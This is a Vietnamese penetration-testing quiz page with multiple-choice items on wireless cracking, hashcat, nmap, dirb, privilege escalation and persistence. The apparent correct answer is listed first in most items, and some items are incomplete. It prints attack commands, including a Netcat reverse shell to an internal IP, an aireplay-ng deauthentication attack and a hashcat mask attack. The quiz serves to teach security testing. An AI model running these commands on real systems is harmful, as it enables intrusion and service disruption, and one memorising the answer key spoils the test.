1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây: root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.cap Mục đích của Tom trong trường hợp này là gì?

C. Bẻ khoá WEP dựa trên gói tin thu được

A. Xác định các mạng hỗ trợ WPS

B. Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối

D. Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khoá WPS PIN

1. Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó?

C. Schtasks.exe /create/tr powershell.exe Sv.ps1/run

A. Net session server | dsquery -user | net use c$

B. Powershell && set-executionpolicy unrestricted

D. Reg save HKLMSystemCurrentControlSetServiceSv.reg

1. Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử dụng tấn công mặt nạ?

A. hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

C. hashcat -m 5600 -o results.text hash.txt wordlist.txt

D. hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

1. Tom đang thực hiện kiểm thử cho một công ty và anh ấy lo ngại rằng Web server đang không chạy bản cập nhật phần mềm mới nhất. Câu lệnh nào dưới đây có thể giúp Tom kiểm tra được những lo ngại của anh ấy?

C. nmap -p 80 -sV targetwebsite.com

A. nc -v -p 80 targetwebsite.com

B. hping3 -S -p80 targetwebsite.com

D. nslookup -port-80 targetwebsite.com

1. Trong quá trình kiểm thử mạng không dây, Tom có thu được 1 số lượng lớn các gói tin handshake. Lệnh nào dưới đây cho phép bẻ khoá PSK dựa trên gói tin handshake thu được sử dụng tập từ điểm cho trước?

D. Aircrack-ng -w rockyou.txt -b <target MAC> <outfile>

A. Airodump-ng -c 1 –bssid E4:6F:13:04:CE:31 -w rockyou.txt

B. Airmon-ng -w rockyou.txt -b <target MAC> <outfile>

C. Hashcat -m 2500 WPA.hccapx rockyou.txt

14. Trong quá trình dò quét nmap, Casey sử dụng cờ -O để xác định thông tin về hệ điều hành của hệ thống. Quá trình dò quét xác định được thông tin về hệ thống như sau: Running: Linux 2.6.x OS CPE: cpe: /o: linux:linux_kernel: 2.6 OS details: Linux 2.6.9 – 2.6.33 Casey có thể xác định điều gì từ những thông tin này?

C. Hệ thống đang chạy linux 2.6 kernel trong khoảng giữa .9 và .33

A. Ngày hệ thống được vá lần cuối

B. Thông tin về các bản vá của linux kernel đã được cài đặt

D. Xác định thông tin về bản phân phối linux (linux distribution) được cài đặt trên hệ thống

1. Trong quá trình kiểm thử xâm nhập, Mary thu thập được một số thông tin các thực cấp thấp cho máy chủ linux thông qua tấn công kỹ nghệ xã hội. Sau khi kiểm tra và xác minh các thông tin đăng nhập này, Mary bắt đầu tìm kiếm cách thực hiện tấn công leo thang đặc quyền và cô phát hiện ra thông tin sau: foo@victim:~$ sudo -l User foo may run the following commands on this host: (root) NOPASSWD: ALL foo@victim:~$ Lỗ hổng cấu hình nào được Mary tìm thấy?

D. Quyền truy cập sudo không an toàn

A. Sử dụng SUID/SGID không an toàn

C. Mật khẩu được lưu trữ dưới dạng bản rõ

1. Liam thực hiện kiểm thử cho hệ thống công ty X. Sau khi thực hiện xâm nhập thành công vào hệ thống, cô ấy thực hiện câu lệnh dưới đây trên máy mục tiêu: Liam đang cố gắng thực hiện việc gì? nc 10.1.10.1 6666 -e /bin/sh

A. Khởi động reverse shell sử dụng Netcat

B. Không có đáp án nào đúng

C. Chặn bắt lưu lượng trên cổng 6666 sử dụng netcat

D. Thiết lập bind shell sử dụng Netcat

1. Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ (phía sau các giải pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có nghĩa là gì?

D. Người kiểm thử chỉ được cung cấp kết nối ban đầu tới các hệ thống đích

A. Người kiểm thử được cung cấp tài khoản quản trị

B. Người kiểm thử sẽ chỉ được kết nối tới hệ thống đích trong một khoảng thời gian thời hạn

C. Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ được xác định trước

1. Tom thực hiện kiểm thử ứng dụng web cho một công ty sử dụng DIRB. Anh ấy muốn dò quét không đệ quy các thư mục trên máy chủ web và tìm kiếm các trang có phần mở rộng là .php. Ngoài ra, mỗi yêu cầu gửi lên phía máy chủ web cần cách nhau một khoảng thời gian xác định để tránh bị phát. Lệnh nào sau đây cho phép anh ấy thực hiện điều này?

C. dirb http://www.webpentest.com -r -X php -z 100

A. dirb http://www.webpentest.com -o php -N 302

B. dirb http://www.webpentest.com -X php -z 100 -v

D. dirb http://www.webpentest.com -z 10 -o php

1. Khi thực hiện kiểm thử xâm nhập, Charles sử dụng nmap để dò quét hệ thống mục tiêu bằng lệnh sau: nmap -sT -sV -T2 -p 1-65535 example.com Sau khi xem quá trình dò quét chạy trong hơn 2 giờ đồng hồ, anh ấy nhận ra rằng mình cần phải tối ưu hoá câu lệnh dò quét. Phương án nào dưới đây KHÔNG phải là cách hữu ích để tăng tốc độ dò quét?

A. Chỉ quét UDP để cải thiện tốc độ

B. Thay đổi mẫu thời gian từ -T2 sang thành -T3 hoặc -T4

C. Sử dụng danh sách cổng mặc định

D. Chuyển sang sử dụng SYN scan

1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện lệnh: root@xali:/tmp# airodump-ng -c 4 --bssid 12:34:56:78:90:AB -w airodump_output wlan0mon Mục đích của Tom trong trường hợp này là gì?

B. Thu thập lưu lượng truy cập từ AP và lưu vào tập tin PCAP

A. Bẻ khoá PSK được sử dụng để kết nỗi với điểm truy cập không dây

C. Lắng nghe các beacon frame để gửi một yêu cầu kết nối tới AP có địa chỉ BSSID 12:34:56:78:AB

D. Tiến hành tấn công brute force PIN WPS để có được quyền truy cập mật khẩu của AP

1. Renee đang tiến hành một cuộc kiểm thử xâm nhập và phát hiện ra bằng chứng cho thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay sau khi xác nhận các nghi ngờ của mình?

B. Báo cáo ngay các thông tin về bằng chứng tấn công cho khách hàng

A. Không cần thực hiện thêm hành động nào vi phạm vì công việc của Renee chỉ giới hạn trong việc thực hiện kiểm thử

C. Ghi lại các chi tiết trong báo cáo kiểm thử xâm nhập

D. Khắc phục lỗ hổng cho phép Renee có quyền truy cập

1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh: root@kalo:~#aireplay-ng -0 0 -a 12:34:56:78:90:AB -c FE:DC:BA:09:87:65 wlan0… Mục đích của Tom trong trường hợp này là gì?

B. Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị đang kết nối trong mạng không dây

A. Khôi phục mật khẩu WPA từ WPS PIN

C. Thiết lập proxy để thực hiện tấn công SSL strip lên các yêu cầu HTTPS

D. Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây

1. Trong quá trình kiểm thử ứng dụng web, Jack phát hiện ra một số lỗ hổng nghiêm trọng. Anh ấy muốn lợi dụng các lỗ hổng này để tạo một tài khoản trái phép. Những tấn công nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của Jack?

A. CSRF, Insecure direct object reference

B. Code injection, Directory traversal

C. Insecure direct object reference, Code injection

2209

Quiz

•

Other

•

University

•

Practice Problem

•

Easy

Hiếu Doãn

Used 6+ times

FREE Resource

C. OSINT

D. Port scanning

Create a free account and access millions of resources

Create resources

Host any resource

Get auto-graded reports

Continue with Google

Continue with Email

Continue with Classlink

Continue with Clever

or continue with

Microsoft

Apple

Others

Already have an account?

Similar Resources on Wayground

68 questions

Ôn Tập Thi Cuối Kỳ 2

Quiz

•

10th Grade - University

74 questions

Chương 2 LSĐ

Quiz

•

University

71 questions

CNXHKH Chương 4-5

Quiz

•

University

65 questions

CHương 1 cơ khí

Quiz

•

University

70 questions

câu 1-70 ngoại

Quiz

•

University

70 questions

Quiz về Hồ Chí Minh

Quiz

•

University

64 questions

ĐỀ 02 - PTCĐ PHÁP LUẬT

Quiz

•

University

69 questions

Bài 14 Quyển 1

Quiz

•

University

Popular Resources on Wayground

10 questions

Honoring the Significance of Veterans Day

Interactive video

•

6th - 10th Grade

9 questions

FOREST Community of Caring

Lesson

•

1st - 5th Grade

10 questions

Exploring Veterans Day: Facts and Celebrations for Kids

Interactive video

•

6th - 10th Grade

19 questions

Veterans Day

Quiz

•

5th Grade

14 questions

General Technology Use Quiz

Quiz

•

8th Grade

25 questions

Multiplication Facts

Quiz

•

5th Grade

15 questions

Circuits, Light Energy, and Forces

Quiz

•

5th Grade

19 questions

Thanksgiving Trivia

Quiz

•

6th Grade

Discover more resources for Other

20 questions

Definite and Indefinite Articles in Spanish (Avancemos)

Quiz

•

8th Grade - University

7 questions

Force and Motion

Interactive video

•

4th Grade - University

9 questions

Principles of the United States Constitution

Interactive video

•

University

18 questions

Realidades 2 2A reflexivos

Quiz

•

7th Grade - University

10 questions

Dichotomous Key

Quiz

•

KG - University

25 questions

Integer Operations

Quiz

•

KG - University

7 questions

What Is Narrative Writing?

Interactive video

•

4th Grade - University

20 questions

SER vs ESTAR

Quiz

•

7th Grade - University